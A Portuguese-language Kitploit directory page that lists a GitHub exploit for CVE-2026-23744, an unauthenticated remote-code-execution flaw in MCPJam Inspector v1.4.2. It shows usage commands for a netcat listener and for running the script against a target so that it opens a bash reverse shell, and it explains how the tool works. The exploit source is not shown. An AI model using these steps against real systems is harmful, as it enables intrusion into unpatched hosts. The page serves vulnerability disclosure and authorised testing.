Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23744-RCE — Esta utilidade foi criada durante pesquisa envolvendo o MCPJam v1.4.2. A aplicação expõe um endpoint de API que aceita um objeto de configuração do servidor. Sob certas condições, validação insuficiente pode permitir execução não intencional de comandos. | Kitploit
Ferramentas/GitHubGitHub/alisster00/cve-2026-23744-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubalisster00/cve-2026-23744-rce

CVE-2026-23744-RCE

Esta utilidade foi criada durante pesquisa envolvendo o MCPJam v1.4.2. A aplicação expõe um endpoint de API que aceita um objeto de configuração do servidor. Sob certas condições, validação insuficiente pode permitir execução não intencional de comandos.

Ver Repositório
19há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

MCPJam Inspector v1.4.2 - Exploit de RCE

Descrição da Vulnerabilidade

O MCPJam Inspector contém uma vulnerabilidade de Execução Remota de Código (RCE) não autenticada no endpoint /api/mcp/connect. A vulnerabilidade permite que atacantes executem comandos arbitrários enviando um payload malicioso de configuração do servidor MCP.

O endpoint aceita um payload JSON com um objeto serverConfig contendo um command e um array args, que são executados diretamente no sistema sem validação ou sanitização adequadas.

Versões Afetadas

  • MCPJam Inspector v1.4.2 e provavelmente versões anteriores

Uso

Pré-requisitos

  • Python 3.6+
  • biblioteca requests: pip install requests
  • netcat ou socat para ouvinte

Início Rápido

Terminal 1 - Iniciar Ouvinte:

nc -lvnp 4444

Terminal 2 - Executar Exploit:

python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444

Exemplos

# Padrão (porta 6274, porta de callback 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>

# Porta MCPJam personalizada
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>

# Porta do ouvinte personalizada
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555

Como Funciona

  1. O script verifica se o MCPJam está acessível no alvo
  2. Constrói um payload malicioso de servidor MCP com shell reverso em bash
  3. Envia o payload para o endpoint /api/mcp/connect
  4. O MCPJam processa o comando e inicia o callback do shell reverso
  5. O usuário recebe um shell interativo no ouvinte

Aviso Legal

⚠️ AVISO LEGAL:

Este exploit é fornecido apenas para fins educacionais e de teste de segurança autorizado. O acesso não autorizado a sistemas de computador é ilegal. Os usuários são os únicos responsáveis por:

  • Obter autorização adequada antes de testar qualquer sistema
  • Cumprir todas as leis e regulamentos aplicáveis
  • Quaisquer danos ou consequências legais decorrentes do uso indevido

O autor não assume qualquer responsabilidade por uso indevido ou danos causados por esta ferramenta. Use por sua conta e risco.

Detalhes Técnicos

  • Endpoint Vulnerável: /api/mcp/connect
  • Método: POST
  • Autenticação: Nenhuma necessária
  • Impacto: Execução Remota de Código não autenticada
Baixar ferramenta